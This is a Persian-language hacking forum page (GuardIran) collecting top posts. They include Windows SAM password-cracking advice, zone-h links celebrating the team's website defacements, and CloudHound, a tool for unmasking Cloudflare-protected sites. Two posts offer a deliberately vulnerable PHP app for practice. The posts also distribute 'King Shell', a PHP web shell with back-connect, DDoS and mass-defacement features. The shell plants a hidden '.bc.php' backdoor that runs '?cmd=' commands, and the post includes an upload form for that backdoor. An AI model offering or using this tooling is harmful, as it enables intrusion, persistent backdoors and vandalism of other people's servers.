ts icon
سرور تیم اسپیک گاردایران

پرچمداران

  1. Phoen1X

    Phoen1X

    مدير بخش


    • امتیاز

      4

    • تعداد ارسال ها

      323


  2. mownten

    mownten

    کاربر انجمن


    • امتیاز

      2

    • تعداد ارسال ها

      313


  3. RT3N

    RT3N

    مدیر تیم


    • امتیاز

      2

    • تعداد ارسال ها

      511


  4. R3dC0d3r

    R3dC0d3r

    مدیر تیم


    • امتیاز

      1

    • تعداد ارسال ها

      123



مطالب محبوب

در حال نمایش مطالب دارای بیشترین امتیاز در یکشنبه, 29 دی 1398 در همه بخش ها

  1. 2 امتیاز
    سلام قابلیت تعویض پسورد ویندوز وجود داره ولی مشاهده خیر. میتونید از ابزار کرک برای کرک پسورد استفاده کنید. توی یه فایل به نام SAM ذخیره میشه.
  2. 2 امتیاز
    دوستان عزیز از این به بعد دیفیس های خودتون رو با دیفیس پیج جدید تیم ثبت کنید تشکر از R3dC0d3r عزیز که زحمت طراحی و ساخت این دیفیس پیج رو کشدیند من شروعش میکنم تا اخرشم باهاتونم به یاد قدیم .... http://www.zone-h.org/mirror/id/33150357 http://www.zone-h.org/mirror/id/33151191 http://www.zone-h.org/mirror/id/33151190 http://www.zone-h.org/mirror/id/33151189 http://www.zone-h.org/mirror/id/33151187 http://www.zone-h.org/mirror/id/33151185
  3. 1 امتیاز
    سلام خدمت همه دوستان انجمن چجوری میشه پسورد یه یوزر رو تو ویندوز بدست اورد کتابخونه ای برای پایتون هست ؟ یا بچ اسکریپتی ؟ من stored username pass رو پسورد رو نشون نمیداد !!
  4. 1 امتیاز
    چند توصیه قبل از تولید محتوا در این قسمت به عزیزانی که قصد فعالیت در انجمن گاردایران را دارند. چند نکته آموزشی برای ارسال مطلب ( مطالب آموزشی) در انجمن برای شما آماده کردیم. " این آموزش صرفا برای کیفیت محتوای تولید شده و سئو میباشد!! " انتخاب موضوع مناسب: سعی کنید بهترین گزینه را برای موضوع مطلب خودتون انتخاب کنید. برچسب زدن: برای مطالب خود برچسب های مرتبط با موضوع ومحتوا بزنید.( فارسی و انگلیسی ) لینک بدهید: سعی کنید برخی از کلمات را لینک دهید این کار باعث میشود امار بازدید کننده سایت بالا رود و این کار برای قرار گرفتن در صفحه اول موتورهای جستجو تاثیر گذارمیباشد. عکس و ویدیو: اگر قصد آموزش های تخصصی دارید سعی کنید با عکس یا ویدیو آموزشی ( همراه با صدا) باشد! ویدیوهای آموزشی در اینستاگرام و یوتیوب و ... گروه گاردایران قرار میگیرد. " محتوای خودتون رو به بهترین شکل ارائه بدین تا بهترین بازدهی رو داشته باشه "
  5. 1 امتیاز
    با سلام خدمت تمامی کاربران و اعضای محترم تیم امنیتی گارد ایران کلود هاوند ابزاری قدرتمند به جهت عبور از سیستم محافظتی کلودفلیر و به دست آوردن آی پی اصلی تارگت می باشد ؛ این ابزار به زبان PHP با کیت کنسول اپلیکیشن رد فریم ورک پیاده سازی شده و به جرات می توان گفت هیچ رقیب هم ترازی برای این ابزار وجود ندارد . متود های استفاده شده برای بایپس پایگاه داده شخصی گاردایران از وبسایت های تحت حفاظت کلودفلیر (در حال حاضر این دیتابیس دارای بیشتر از دو میلیون رکوردست است که روز به روز به این تعداد افزوده می شود ؛ این دیتابیس دارای سیستم Automatic Farming فعال بر روی VPS است که روزانه عمل Farming از سطح اینترنت را انجام خواهد داد) حمله افشای آی پی (این حمله از طریق متد پینگ بک ، استفاده شده در سیستم های مدیریت محتوا امکان پذیر است) اسکن گسترده زیر دامنه ها (بیشتر از 10 هزار زیر دامنه رایج) نیازمندی های کلودهاوند پی اچ پی ورژن پنج به بالا افزونه PHP_PDO_SQLITE نحوه استفاده خط فرمان یا ترمینال را در پوشه ریشه ای نرم افزار باز کرده و دستور زیر را تایپ کنید : php application از زمان اجرای نرم افزار دو فرمان عملیاتی در دسترس شما قرار دارد : detect hostname whois hostname ویدیو معرفی توسعه دهندگان کاری مشترک از : @R3dC0d3r & @RT3N پی نوشت تمامی حقوق این نرم افزار متعلق به تیم امنیتی گارد ایران می باشد کلودهاوند دارای لایسانس GPL 3 می باشد ؛ هرگونه تخطی از قوانین مربوط به این لایسانس برابر قطع دسترسی از API گاردایران خواهد بود - مخزن گیت هاب کلود هاوند CloudHound V1.0.0.zip
  6. 1 امتیاز
    Phoen1X

    GuardIran Vulnerable Web App

    سلام امروز دومین برنامه ام رو برای تیم نوشتم برنامه قبلی که در زمینه کرک هش به صورت آفلاین و آنلاین بود در این تاپیک هستش و یکی از کاربران گرامی هششون رو گذاشته بودن و گفته بودن کرک نمی کنه هش شمارو سایت hashkiller.co.uk هم کرک نکرد بعد انتظار دارید برنامه بنده کرک کنه ؟ گناه داره طفلکی اینقد براش سخت نگیرید خب این هم از سرور های همین سایت ها استفاده می کنه دیگه البته چند تا جدید هم پیدا کردم ولی به دلیل حذف سورس برنامه دیگه نمی تونم قرار بدم و نوشتن دوباره این برنامه هم از حوصله ما خارجه .... خب به هر حال براتون اسکریپتی رو آماده کردم مخصوص دوستان و کاربرانی هست که تازه شروع کردن به یادگیری آسیب پذیری های PHP مثل خودم این اسکریپت به زبان PHP نوشته شده و مخصوص تست کردن آسیب پذیری های PHP رو لوکال هاستتون هست . با این اسکریپت دیگه نیازی به تارگت ندارید چون از هرکدوم یکی رو لوکال هاستتون دارید و میتونید تست کنید در ضمن نیازی به پایبیس کردن هم ندارید . این اسکریپت مثل DVWA هستش ولی با این تفاوت که کار باهاش راحت تره و مخصوص دوستان تازه کار مثل خودم نوشته شده . این اسکریپت 11 آسیب پذیری داره که شامل : - SQL Injection - Blind SQL Injection - Authentication Bypass - XSS Stored - XSS Reflected - File Upload - Cross Site Request Forgery - Remote File Inclusion - Local File Disclosure/Download - Remote Code Execution - Remote Command Execution میشه عکس از محیط اسکریپت : توی این ویدیو مروری می کنم بر تمامی آسیب پذیری ها و به سرعت قسمت های مختلف اسکریپت رو نشون میدم : لینک در آپارات http://www.aparat.com/v/vu10C و در این ویدیو هم چیز خاصی نشون نمی دم فقط قسمت هایی که باید اطلاعات رو برای نصب اسکریپت بگیرید نشون میدم لینک در آپارات http://www.aparat.com/v/owHT5 همینطوریم میگم برای دوستانی که نمی خوان فیلم ببینن پیشنهاد من استفاد از نرم افزار xampp هستش اگه تازه میخواید نصب کنید و یا نصب کردید که نیازی به وارد کردن تنظیمات نیست فقط محتویات فایل فشرده رو بریزید تویه یه پوشه تویه htdocs حالا هرچی می خواد باشه بعد apache و mysql رو اجرا کنید دقت کنید هر دوش باید اجرا باشن بعد برید به localhost/file name in htdocs اگرم که نصب کردید و یوز و پسورد دیتابیس رو عوض کردید به config/config.php برید و به جای یوزر که نوشتم root و پسورد که خالی گذاشتم یوزر و پسوردتون رو بنویسید . خب حالا نیاز به سه کار دارید دوتاش رو اسکریپت خودش اگر انجام ندید ازتون ایراد می گیره ولی یکیش رو نه یادم رفته وارد کنم الان که آپلود کردم یادم اومد ولی عیبی نداره خب به این آدرس برید C:\xampp\php\php.ini سرچ کنید file_uploads و اگر off هست on بنویسید دوباره سرچ کنید allow_url_include و دوباره مقدار رو برابر on قرار بدید دوباره سرچ کنید allow_url_fopen و on کنید و apache رو ریستارت کنید و اسکریپت آماده کار هستش فقط به یکی از آدرس های زیر برید localhost/[file_name] 127.0.0.1/[file_name] موفق باشید اگر خوب لایک و تشکر خورد ورژن دوش هم با باگ های پر استفاده روز براتون قرار می دم و تاپیکی رو هم میسازم و آموزش کار با هر آسیب پذیری و پچ کردن آسیب پذیری رو به صورت حرفه ایی آموزش می دم. درضمن توسط مدیریت کل تیم C0d3!Nj3ct!0n هم برسی شده GI_VULN.rar
  7. 1 امتیاز
    Phoen1X

    GuardIran Vulnerable Web App

    ورژن دو ورژن دو اسکریپت Vulnerable Web Application رو طراحی کردیم با تغییرات بسیار زیاد لیست تغییرات : - اضافه شدن 3 آسیب پذیری جدید - رفع باگ ها - ساخته شدن قسمت template برای دوستانی که قصد ادیت اسکریپت رو دارند - طراحی جدید بر پایه Bootstrap 4 لیست تمام آسیب پذیری ها : Sql Injection Blind Sql Injection Authentication Bypass XSS Stored XSS Reflected File Upload Cross Site Request Forgery Remote File Inclusion Local File Disclosure/Download Remote Code Execution Remote Command Execution PHP Object Injection آموزش تنظیمات اسکریپت این اسکریپت مخصوص افراد مبتدی طراحی شده پس باید کار باهاش خیلی راحت باشه که هست فقط کافیه یک دیتابیس بسازید و وارد فایل config در ادرس config/config.php بشید و اطلاعات دیتابیس رو وارد کنید <?php $_sv = "host here"; $_user = "db username here"; $_pass = "dbpass here "; $dbnamegi = "db name here"; ?> و تمام در ورژن دو تغییرات بسیار زیادی در سورس هر قسمت انجام گرفته که میتونید خودتون مشاهده کنید قسمت learn more پیشرفته تر شده و برای هر قسمت شما حداقل سه آموزش رو دارید به علاوه میتونید با وب سایت های آموزش هک و امنیت هم آشنایی پیدا کنید... ان شالله اگر که بیکار بودم خودم توی تاپیکی که ایجاد کردم هر قسمت رو آموزش میدم لینک در گیت هاب : Github تصویر محیط اسکریپت : موفق باشید vulnerable web app.rar vulnerable web app.rar
  8. 1 امتیاز
    Phoen1X

    GuardIran King Shell

    به نام خدا چند وقتی هست که طراحی و برنامه نویسی این شل تمام شده اما باید مدتی مورد تست قرار می گرفت تا از درست کار کردنش مطمئن میشدم خب GuardIran King Shell شل جدیدی هست که در دو ورژن معمولی (امکانات بیشتر) و بایپس (توسط هیچ نرم افزار امنیتی شناخته نمی شه) برنامه نویسی شده که امکانات فوق العاده ایی داره فعلا این شل در ورژن 1 بتا هستش پس امکان داره باگی وجود داشته باشه و من هنوز اون رو پیدا نکرده باشم برای همین اگر باگی مشاهده کردید به بنده اطلاع بدید تا در ورژن بعدی فیکس بشه . طراحی این شل با استفاده از فریمورک bootstrap 3 و بر اساس جدید ترین الگوی طراحی یعنی Google Material Design , طراحی شده که میتونید از اینجا اطلاعات بیشتری دریافت کنید . این شل در سه رنگ آبی , بنفش و سبز طراحی شده خب از طراحیش که بگذریم به مهم ترین قسمت یعنی امکاناتش میرسیم که به شرح زیر هستش : - ساخت , ادیت , تغییر پرمیژن و تغییر نام فایل و دایرکتوری - آپلود فایل - بک کانکت گیری - ساخت بکدور به صورت اتوماتیک - CGI Telnet - اتصال به دیتابیس mysql - خواندن اطلاعات از روی دیتابیس mysql - تغییر مقادیر کالومن ها - تبدیل متن به base 64 , md5 ,sha1 , urlencode - دیکود متن از urlencode , base64 - اجرای کد های php روی سرور با استفاده از eval - بایبیس safe mode - پورت اسکنر - دیداسر - مس دیفیسر - ثبت کننده اتوماتیک در zone h و aljyyosh - کارکرد مطلوب در سرور های ویندوزی (در صورتی که کامپایلر php نصب باشه) در مورد بکدوری که میسازه هربار که شل اجرا میشه یک فایل به نام .bc.php در کنارش ساخته میشه که اگر ادمین شل شمارو پاک کرد این فایل باقی بمونه و همونطور که میدونید فایل هایی که با . شروع بشن به صورت دیفالت در سی پنل نمایش داده نمی شن . استفاده از این بکدور به این صورت هستش که وقتی به آدرس بکدور میرید با یک صفحه خالی مواجه میشید اما کافیه در کنار ادرس عبارت ?cmd= بنویسید و بعد کامندی که میخواید روی سرور اجرا بشه اگر شرکت هاست دهنده فانکشن system رو نبسته باشه کامند شما اجرا و نتایج نمایش داده میشن و قابلیت دیگه این بکدور اینه که میتونید فایل اپلود کنید برای این کار از کدهای html زیر استفاده کنید و به جای .bc.php ادرس همون فایل بکدور رو بذارید <form method="post" enctype="multipart/form-data" action="bc.php"> <input type="file" name="fileToUp"><input type="submit" value="OK" name="fileSubmit"> </form> پسورد شل king هستش و میتونید به هرچی دوست دارید رو جاش بذارید فقط کافیه متغییر $pass رو عوض کنید. پسور Cgi-telnet هم king هست دوستانی که مایل باشن در برنامه نویسی شل به بنده کمک کنن میتونن اسکریپتی که میخوان در شل قرار بگیره رو برای من پ.خ کنن . همچنین هرگونه کپی برداری , ادیت , تغییر محتویات و ... مجاز و از نظر بنده هیچ مشکلی نداره همچنین این شل توسط DeMoN تست و تایید شده. shell.rar bypass_shell.rar
  9. 1 امتیاز
    Phoen1X

    GuardIran King Shell

    آپدیت ورژن 1.0.0 Fix در این ورژن مشکل عقب گرد دایرکتوری حل شده و همینطور هم تغییر دایرکتوری هم آسان تر شده و در ابتدا دایرکتوری ها به نمایش در میان و بعد فایل ها همینطور قسمت ثبت دیفیس ها در aljyyosh هم فعلا غیر فعال شده به زودی با ورژن 2 در خدمت شما هستم که از امکانات بیشتر , طراحی بهتر و استفاده از تکنولوژی ajax بهره میبرد bypass.php